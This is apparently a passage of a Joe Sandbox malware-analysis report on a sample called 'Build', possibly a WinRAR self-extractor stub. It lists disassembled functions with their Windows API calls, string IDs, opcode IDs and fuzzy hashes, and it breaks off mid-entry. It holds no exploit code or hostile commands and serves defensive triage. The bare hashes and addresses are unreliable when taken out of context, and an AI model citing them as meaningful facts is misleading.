                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                    • String ID: LICENSEDLG
                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                    • Opcode ID: e92f8901d259655e4fe68985209eb4e48ed532c5f36fe232da0aa48e70e7e2fe
                                                                                                    • Instruction ID: bdeebc2454eead28ce8e794c3e2968b7f0b300e3da3a17239eb35bb76e0d5655
                                                                                                    • Opcode Fuzzy Hash: e92f8901d259655e4fe68985209eb4e48ed532c5f36fe232da0aa48e70e7e2fe
                                                                                                    • Instruction Fuzzy Hash: 1621D13222E2047BD7115FA5FC5DF3B7B6CEB8AB81F114418F641A26A0CB62D901AB71
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0092BFA3
                                                                                                      • Part of subcall function 009334D7: GetSystemTime.KERNEL32(?,00000000), ref: 009334EF
                                                                                                      • Part of subcall function 009334D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 009334FD
                                                                                                      • Part of subcall function 00933480: __aulldiv.LIBCMT ref: 00933489
                                                                                                    • __aulldiv.LIBCMT ref: 0092BFCF
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,?,?), ref: 0092BFD6
                                                                                                    • _swprintf.LIBCMT ref: 0092C001
                                                                                                      • Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13
                                                                                                    • _wcslen.LIBCMT ref: 0092C00B
                                                                                                    • _swprintf.LIBCMT ref: 0092C061
                                                                                                    • _wcslen.LIBCMT ref: 0092C06B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                                                                                    • String ID: %u.%03u
                                                                                                    • API String ID: 2956649372-1114938957
                                                                                                    • Opcode ID: 89edd704e79ac358b7590e81d865be59fe08af600488895449d686a7672d9dac
                                                                                                    • Instruction ID: 2573fd47c1938a3cbe59467dfe24a66ad08938049e075279dca20a1878ed8706
                                                                                                    • Opcode Fuzzy Hash: 89edd704e79ac358b7590e81d865be59fe08af600488895449d686a7672d9dac
                                                                                                    • Instruction Fuzzy Hash: 352150B2A083509FC614EF69DC86EAF77DCABC4750F444A1EF488D7251DA34D9088BA2
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CBEE
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0093CC05
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0093CC19
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0093CC2A
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0093CC42
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0093CC66
                                                                                                    • _swprintf.LIBCMT ref: 0093CC85
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                                                                                    • String ID: %s %s
                                                                                                    • API String ID: 385609497-2939940506
                                                                                                    • Opcode ID: 11ec98d8e4a4663611a448b9c0c8c8560a6bba40263f96c2cf1717dfe2f1d77c
                                                                                                    • Instruction ID: b735e99d310b11e966f3b270602c7f891344c8d4a8c0164ece37f5a8fcf14511
                                                                                                    • Opcode Fuzzy Hash: 11ec98d8e4a4663611a448b9c0c8c8560a6bba40263f96c2cf1717dfe2f1d77c
                                                                                                    • Instruction Fuzzy Hash: 002127B290424CABDB20DFA5DD44EEE77BCEB49305F00456AFA0AD7052E630AA05CB60
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0092CEA9,0092CEAB,00000000,00000000,1C667296,00000001,00000000,00000000,?,0092CD87,?,00000004,0092CEA9,ROOT\CIMV2), ref: 009423E9
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0092CEA9,?,00000000,00000000,?,?,0092CD87,?,00000004,0092CEA9), ref: 00942464
                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0094246F
                                                                                                    • _com_issue_error.COMSUPP ref: 00942498
                                                                                                    • _com_issue_error.COMSUPP ref: 009424A2
                                                                                                    • GetLastError.KERNEL32(80070057,1C667296,00000001,00000000,00000000,?,0092CD87,?,00000004,0092CEA9,ROOT\CIMV2), ref: 009424A7
                                                                                                    • _com_issue_error.COMSUPP ref: 009424BA
                                                                                                    • GetLastError.KERNEL32(00000000,?,0092CD87,?,00000004,0092CEA9,ROOT\CIMV2), ref: 009424D0
                                                                                                    • _com_issue_error.COMSUPP ref: 009424E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 1353541977-0
                                                                                                    • Opcode ID: b1639f33e066bb8257d17512a57524233765de7750d7ae4f1c6c380b6e5e9856
                                                                                                    • Instruction ID: daab0ff501795f6611d3405d9236c204cbe8b32a42c70b8f1c80388f021898a3
                                                                                                    • Opcode Fuzzy Hash: b1639f33e066bb8257d17512a57524233765de7750d7ae4f1c6c380b6e5e9856
                                                                                                    • Instruction Fuzzy Hash: 98412871A04304ABDB10DFA9DC45FAEBBB8FB88721F504229F505E72A1DB349800CBA5
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClearH_prolog3Variant
                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                    • API String ID: 3629354427-3505469590
                                                                                                    • Opcode ID: ec581db4e7d4ace5580cbc9589ed8a0ea0c65b904a757006582780e7520b5db4
                                                                                                    • Instruction ID: bd66ee99c20b9556d60737c0a778bba3d13158b587d9ca418995d5ef73814d0b
                                                                                                    • Opcode Fuzzy Hash: ec581db4e7d4ace5580cbc9589ed8a0ea0c65b904a757006582780e7520b5db4
                                                                                                    • Instruction Fuzzy Hash: BB715CB0A00229AFDB14DFA5DC94EBEB7B9FF88711B540169F516E72A0CB34AD01CB50
                                                                                                    APIs
                                                                                                    • __aulldiv.LIBCMT ref: 0093331D
                                                                                                      • Part of subcall function 0092D076: GetVersionExW.KERNEL32(?), ref: 0092D0A7
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00933340
                                                                                                    • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00933352
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00933363
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00933373
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00933383
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 009333BE
                                                                                                    • __aullrem.LIBCMT ref: 00933464
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1247370737-0
                                                                                                    • Opcode ID: fc9bbfa5d08590ad206b383b3fa46c451fb3522b0c82d2a040c78ef106b00b83
                                                                                                    • Instruction ID: 530b9895676566848309514a1eb49d79170be093c8e9881eb241ebb8745b5548
                                                                                                    • Opcode Fuzzy Hash: fc9bbfa5d08590ad206b383b3fa46c451fb3522b0c82d2a040c78ef106b00b83
                                                                                                    • Instruction Fuzzy Hash: E05134B1548345AFC710DF65C88496BFBE9FB88715F408A2EF596C3210E774EA48CB62
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                    • API String ID: 176396367-3568243669
                                                                                                    • Opcode ID: 6d70ad5bbcf7ab98970d9659fc93c5e2fbcb4c42bb89ba530365736c07d6820e
                                                                                                    • Instruction ID: dc1ca8545ae0939cef89bb8f002f942ef4ddf4de0c0a437fe5c3ea43364e62a4
                                                                                                    • Opcode Fuzzy Hash: 6d70ad5bbcf7ab98970d9659fc93c5e2fbcb4c42bb89ba530365736c07d6820e
                                                                                                    • Instruction Fuzzy Hash: 92512BA6B4435756DB305E59982277763E8DFA0790F68042BFFC18B1C0FB758D818BA1
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00952452,00000000,00000000,00000000,00000000,00000000,00947A3D), ref: 00951D1F
                                                                                                    • __fassign.LIBCMT ref: 00951D9A
                                                                                                    • __fassign.LIBCMT ref: 00951DB5
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00951DDB
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,00952452,00000000,?,?,?,?,?,?,?,?,?,00952452,00000000), ref: 00951DFA
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000001,00952452,00000000,?,?,?,?,?,?,?,?,?,00952452,00000000), ref: 00951E33
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: 257caa735fdbaa2ea835f4c2cd55e2525123b7b1072070f2e5f7c5918ceeb965
                                                                                                    • Instruction ID: 8435adde7a80b94c5940631ddcd383188e2678003a7bba6e6673d4f872acf03b
                                                                                                    • Opcode Fuzzy Hash: 257caa735fdbaa2ea835f4c2cd55e2525123b7b1072070f2e5f7c5918ceeb965
                                                                                                    • Instruction Fuzzy Hash: 0251D175A00249AFDB10CFA9D886BEEBBF8FF09301F14451AED55E7291E7309948CB60
                                                                                                    APIs
                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0092AD2B
                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0092AD4A
                                                                                                      • Part of subcall function 0092E208: _wcslen.LIBCMT ref: 0092E210
                                                                                                      • Part of subcall function 00934168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0092E084,00000000,.exe,?,?,00000800,?,?,?,0093AD5D), ref: 0093417E
                                                                                                    • _swprintf.LIBCMT ref: 0092ADEC
                                                                                                      • Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0092AE5E
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0092AE9E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                    • String ID: rtmp%d
                                                                                                    • API String ID: 2133196417-3303766350
                                                                                                    • Opcode ID: a9a674c3a27b32375f43ad3ebfd93fc50cdd8e7223c26dbdc6c47e9d3d28dac1
                                                                                                    • Instruction ID: ffd68ff2e542b8e1d57bb6f8e777502234ab6a9042b9064a629b7abc69a67b4f
                                                                                                    • Opcode Fuzzy Hash: a9a674c3a27b32375f43ad3ebfd93fc50cdd8e7223c26dbdc6c47e9d3d28dac1
                                                                                                    • Instruction Fuzzy Hash: CE519472900628ABCF20EB60EC85FEF737CAF54341F4508A9B556E3145EB389A85DF61
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0093BE8A
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0093BED1
                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 0093BF6C
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0093BF74
                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0093BF8A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$RectText
                                                                                                    • String ID: RarHtmlClassName
                                                                                                    • API String ID: 3937224194-1658105358
                                                                                                    • Opcode ID: dc6cc47b18c8d52d9f14c7018bccca78322d9a7e9c55e7d3f80c2edccc02112c
                                                                                                    • Instruction ID: b1c52624bc498c2aaeda489b39e354c44846abbca8f8667f01dfea4b9fdf9e62
                                                                                                    • Opcode Fuzzy Hash: dc6cc47b18c8d52d9f14c7018bccca78322d9a7e9c55e7d3f80c2edccc02112c
                                                                                                    • Instruction Fuzzy Hash: 1941837251C304AFCB21AFA8DC49B6BBBECEF88711F154559FA499A251DB30D804CFA1
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00944F57
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00944F5F
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00944FE8
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00945013
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00945068
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 6f41189c9e79ce6aa57ccab0cd0eaae3f689cbc384aabe98cad20914536b94bc
                                                                                                    • Instruction ID: 989457f8324cb871a44f505db70fd4a64ead370ec10bcebb01d86ff47820c54b
                                                                                                    • Opcode Fuzzy Hash: 6f41189c9e79ce6aa57ccab0cd0eaae3f689cbc384aabe98cad20914536b94bc
                                                                                                    • Instruction Fuzzy Hash: EC41B634A002189FCF10DF69C885F9EBBB9BF49318F148196F914AB392D731A919CB91
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                    • API String ID: 176396367-3743748572
                                                                                                    • Opcode ID: f0036231a9743634c30c3c217a85241103b07ac900f68bf825af6ec325a6aed3
                                                                                                    • Instruction ID: 73ecd3dc69df4680c1e73fc400a4e1d1adaf7bc89d87602e3d3258c59a42a458
                                                                                                    • Opcode Fuzzy Hash: f0036231a9743634c30c3c217a85241103b07ac900f68bf825af6ec325a6aed3
                                                                                                    • Instruction Fuzzy Hash: 12318F6264430556DA34EF94AC42F7BB3E8EBD0328F60442FFB95972C0FB54AD8487A1
                                                                                                    APIs
                                                                                                      • Part of subcall function 0094EEB8: _free.LIBCMT ref: 0094EEE1
                                                                                                    • _free.LIBCMT ref: 0094EF42
                                                                                                      • Part of subcall function 0094BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?), ref: 0094BB10
                                                                                                      • Part of subcall function 0094BAFA: GetLastError.KERNEL32(?,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?,?), ref: 0094BB22
                                                                                                    • _free.LIBCMT ref: 0094EF4D
                                                                                                    • _free.LIBCMT ref: 0094EF58
                                                                                                    • _free.LIBCMT ref: 0094EFAC
                                                                                                    • _free.LIBCMT ref: 0094EFB7
                                                                                                    • _free.LIBCMT ref: 0094EFC2
                                                                                                    • _free.LIBCMT ref: 0094EFCD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                                                    • Instruction ID: 1d90d35ebb03736b111e300d88ee1587bca6b9d0ab39ebd001c836ddbe2a3571
                                                                                                    • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                                                    • Instruction Fuzzy Hash: BE110A72940B04AEE620FBB1CC07FCB77ECBF84700F404C15F29AA6692DB75B5068654
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00940B46,00940AA9,00940D4A), ref: 00940AE2
                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00940AF8
                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00940B0D
                                                                                                    Strings
                                                                                                    Memory Dump Source
